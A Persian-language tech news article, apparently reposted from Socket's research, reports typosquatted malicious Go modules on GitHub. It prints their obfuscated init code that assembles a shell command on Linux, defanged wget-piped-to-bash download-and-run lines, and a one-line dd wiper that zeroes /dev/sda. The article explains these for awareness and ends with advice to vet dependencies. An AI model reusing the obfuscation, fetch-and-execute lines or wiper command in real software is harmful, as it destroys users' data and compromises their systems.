فناوری روز

کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات

تیم تحقیقاتی Socket در گزارش جدید خود از شناسایی ماژول‌های مخربی خبر داده که به‌طور خاص به سیستم‌های کاربران حمله کرده و هارد دیسک آن‌ها را به‌طور کامل پاک می‌کنند. این حملات از طریق ماژول‌های برنامه‌نویسی زبان Go انجام می‌شود که کدهایی را شامل می‌شوند که باعث تخریب کامل داده‌های سیستم می‌شوند. به گزارش تکناک، […] نوشته کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات اولین بار در تک ناک - اخبار تکنولوژی روز جهان و ایران. پدیدار شد.

tnastnas
۱۳ اردیبهشت , ۱۴۰۴ - 05:00
 3
کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات

تیم تحقیقاتی Socket در گزارش جدید خود از شناسایی ماژول‌های مخربی خبر داده که به‌طور خاص به سیستم‌های کاربران حمله کرده و هارد دیسک آن‌ها را به‌طور کامل پاک می‌کنند. این حملات از طریق ماژول‌های برنامه‌نویسی زبان Go انجام می‌شود که کدهایی را شامل می‌شوند که باعث تخریب کامل داده‌های سیستم می‌شوند.

به گزارش تکناک، اگر با زبان Go آشنا نیستید، باید بگوییم که Go یک زبان برنامه‌نویسی کامپایل‌شده است که توسط گوگل طراحی شده است. این زبان به‌دلیل پشتیبانی قوی از هم‌زمانی (انجام چندین کار هم‌زمان) و عملکرد خوبش محبوب است.

علاوه بر این، Go به فایل‌های اجرایی واحد کامپایل می‌شود که استقرار برنامه‌ها را بسیار ساده می‌کند. توسعه‌دهندگان اغلب Go را به‌دلیل خوانایی آسان و قابلیت استفاده بالا دوست دارند که این عامل به محبوبیت آن افزوده است.

نئووین می‌نویسد که اکوسیستم Go بسیار وسیع و باز است و ماژول‌های زیادی از مخازن عمومی مانند GitHub در دسترس هستند. دسترسی آسان به این ماژول‌ها و قابلیت دریافت کد به‌طور مستقیم از مخازن جذاب است، اما این ساختار خود چالش‌های امنیتی جدی ایجاد می‌کند. هیچ مرجع مرکزی وجود ندارد که قبل از قرار گرفتن ماژول‌ها برای استفاده در دسترس توسعه‌دهندگان، آن‌ها را بررسی کند.

این به این معنی است که توسعه‌دهندگان اغلب با ماژول‌های مشابه در GitHub مواجه می‌شوند که از نظر نام مشابه هستند اما توسط افراد مختلف ایجاد شده‌اند و این امر تشخیص اینکه کدام ماژول معتبر است را دشوار می‌کند.

این محیط بدون مرجع مرکزی و استاندارد نام‌گذاری واضح، آسیب‌پذیری زیادی در برابر تکنیک‌های typosquatting دارد. در این تکنیک، مهاجمان ماژول‌های مخربی با نام‌هایی مشابه با ماژول‌های معتبر ثبت می‌کنند تا در نگاه اول قابل اعتماد به‌نظر برسند و احتمال اینکه توسعه‌دهندگان به‌طور تصادفی کدهای مخرب را در پروژه‌های خود بگنجانند، افزایش یابد.

چنین تهدیدهایی در ماه گذشته نیز مشاهده شد، زمانی که تیم Socket سه ماژول مخرب Go را شناسایی کرد که از روش‌های مشابهی برای پنهان کردن ماهیت خود استفاده می‌کردند.

این ماژول‌ها به‌شرح زیر شناسایی شدند:

  • github[.]com/truthfulpharm/prototransform
  • github[.]com/blankloggia/go-mcp
  • github[.]com/steelpoor/tlsproxy

اگرچه این ماژول‌ها معمولی به‌نظر می‌رسیدند، اما کدی را شامل می‌شدند که به‌طور خاص برای برقراری ارتباط و دانلود برنامه‌های مخرب جهت اجرا بر روی دستگاه قربانی طراحی شده بود. اسکنرهای امنیتی Socket این اقدامات مشکوک را شناسایی کردند که تحقیقات دقیق‌تر را در پی داشت و دامنه کامل حمله فاش شد.

مهاجمان از یک ترفند هوشمندانه برای پخش قسمت‌هایی از دستورات در داخل آرایه‌ای از رشته‌ها استفاده کردند و سپس آن‌ها را به‌طور پویا بازسازی کردند. این روش، که به‌نام obfuscation مبتنی بر آرایه‌های رشته‌ای شناخته می‌شود، روشی است برای سخت‌تر کردن شناسایی کد مخرب از طریق جستجوهای ساده با کلمات کلیدی.

Go یک زبان برنامه‌نویسی کامپایل‌شده

در اینجا نمونه‌ای از کد obfuscated در یکی از ماژول‌ها، truthfulpharm/prototransform، آورده شده است:

func eGtROk() error {
    DmM := []string{"4", "/", " ", "e", "/", "g", "d", "3", "6", " ", "4", "w", "/", "7", "d", ".", "O", " ", "s", "b", "5", "3", "/", "c", "t", "0", "4", "c", "h", " ", "f", "a", "t", "/", "i", "/", "1", "b", "n", "p", "t", "7", "d", "-", "&", ":", "4", "e", "t", "4", "-", "d", "4", "g", "o", "d", "s", "e", "r", "7", ".", "/", "|", ".", " ", "1", "h", " "}
    pBRPhsxN := runtime.GOOS == "linux"
    bcbGOM := "/bin/sh"
    vpqIU := "-c"
    PWcf := DmM[11] + DmM[5] + DmM[47] + DmM[32] + DmM[29] + DmM[50] + DmM[16] + DmM[2] + DmM[43] + DmM[17] + DmM[66] + DmM[24] + DmM[40] + DmM[39] + DmM[45] + DmM[12] + DmM[4] + DmM[36] + DmM[49] + DmM[13] + DmM[15] + DmM[46] + DmM[20] + DmM[63] + DmM[0] + DmM[26] + DmM[60] + DmM[52] + DmM[65] + DmM[22] + DmM[56] + DmM[48] + DmM[54] + DmM[58] + DmM[31] + DmM[53] + DmM[3] + DmM[35] + DmM[51] + DmM[57] + DmM[7] + DmM[59] + DmM[21] + DmM[14] + DmM[25] + DmM[55] + DmM[30] + DmM[33] + DmM[23] + DmM[27] + DmM[42] + DmM[41] + DmM[19] + DmM[10] + DmM[8] + DmM[6] + DmM[67] + DmM[62] + DmM[9] + DmM[1] + DmM[37] + DmM[34] + DmM[38] + DmM[61] + DmM[18] + DmM[28] + DmM[64] + DmM[44]
    if pBRPhsxN {
        exec.Command(bcbGOM, vpqIU, PWcf).Start()
    }

    return nil
}

var GEeEQNj = eGtROk()

این اسکریپت ابتدا بررسی می‌کند که آیا کد روی یک سیستم لینوکس در حال اجرا است یا خیر. اگر چنین باشد، دستوری را با استفاده از قطعات موجود در آن آرایه رشته‌ای می‌سازد. این دستور سپس به شل سیستم داده می‌شود تا اجرا شود. از آنجا که این کد سیستم‌عامل را بررسی می‌کند، این حمله به‌طور خاص به سیستم‌های توسعه‌دهندگان یا سرورهای لینوکس هدف‌گذاری کرده است.

زمانی که آن رشته‌های درهم ریخته دوباره کنار هم قرار گرفتند، دستور تشکیل‌شده یک دستور ساده برای دانلود و اجرای اسکریپت به‌طور مستقیم بود:

# prototransform module payload
wget -O - [.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - [.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - [.]41/storage/de373d0df/ccd7b46d | /bin/sh &

این دستورات به سیستم می‌گویند که یک فایل از یک آدرس وب از راه دور با استفاده از wget بارگیری کرده و سپس بلافاصله محتوای آن فایل را به شل /bin/bash یا /bin/sh وارد کند تا آن را اجرا کند. این اتفاق به‌طور فوری رخ می‌دهد و فایل به‌طور استاندارد ذخیره نمی‌شود که این امر تجزیه و تحلیل یا مداخله پیش از انجام آسیب را دشوار می‌سازد.

آنچه که این حمله را به‌ویژه ویرانگر کرد، اسکریپتی بود که این دستورات دانلود و اجرا می‌کردند. این اسکریپت اغلب با نام done.sh شناخته می‌شد و فقط یک خط داشت که سرنوشت سیستم را تعیین می‌کرد:

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

این دستور از ابزار dd در لینوکس استفاده می‌کند. این دستور به dd می‌گوید که داده‌ها را از /dev/zero (یک منبع خاص سیستم که همیشه بایت‌های صفر را فراهم می‌کند) کپی کرده و آن‌ها را مستقیماً بر روی /dev/sda بنویسد. در بیشتر سیستم‌های لینوکس، /dev/sda نمایانگر هارد دیسک اصلی است که سیستم‌عامل در آن قرار دارد، همراه با هر داده‌ای که کاربر ذخیره کرده است – فایل‌ها، برنامه‌ها، همه چیز.

با نوشتن صفرهای بی‌پایان روی /dev/sda، این دستور تمام اطلاعات را از بین می‌برد و به‌طور غیرقابل بازگشتی داده‌ها را پاک می‌کند. نتیجه نهایی ویرانی کامل است. ساختار فایل سیستم نابود می‌شود، سیستم‌عامل حذف می‌شود و تمام داده‌ها برای همیشه از بین می‌روند. این یعنی تمام کارها متوقف می‌شود و علاوه بر مشکلات فنی، هزینه‌های بالای پاک‌سازی و آسیب به شهرت شرکت‌ها به همراه خواهد داشت.

برای حفاظت از خود در برابر این حملات، باید با دقت هر کدی که به پروژه خود اضافه می‌کنید، بررسی کنید. فقط به‌دلیل اینکه یک ماژول نام خوبی دارد یا در GitHub است، به آن اعتماد نکنید. باید از ابزارهای خودکار برای اسکن کد این کتابخانه‌ها استفاده کنید تا آسیب‌پذیری‌های شناخته‌شده و الگوهای مشکوک شناسایی شوند.

نوشته کشف ماژول‌های مخرب Go با قابلیت پاک‌سازی کامل اطلاعات اولین بار در تک ناک - اخبار تکنولوژی روز جهان و ایران. پدیدار شد.

منبع خبر

تگ ها:

نوشته قبلی

گوشی Ulefone Armor X32 با دوربین دید در شب معرفی شد

نوشته بعدی

رونمایی کاسیو از ساعت G-Shock GBX-100S با طراحی شفاف

واکنش شما چیست؟

like

dislike

love

funny

angry

sad

wow

tnas
tnas

نوشته های مرتبط

تخفیف ۵۰۰ هزار تومانی تاکسی اینترنتی ماکسیم برای مشترکین سیم‌کارت‌های شاتل‌موبایل

تخفیف ۵۰۰ هزار تومانی تاکسی اینترنتی ماکسیم برای مشترکی...

tnas ۱۰ اردیبهشت , ۱۴۰۴  2

عکس | مگاکروزر، شاسی بلند کمیاب تویوتا با لاستیک‌های غول‌پیکر

عکس | مگاکروزر، شاسی بلند کمیاب تویوتا با لاستیک‌های غو...

tnas ۰۷ اردیبهشت , ۱۴۰۴  4

انتخاب یک لپ تاپ مناسب بسیار ساده است

انتخاب یک لپ تاپ مناسب بسیار ساده است

tnas ۰۴ اردیبهشت , ۱۴۰۴  3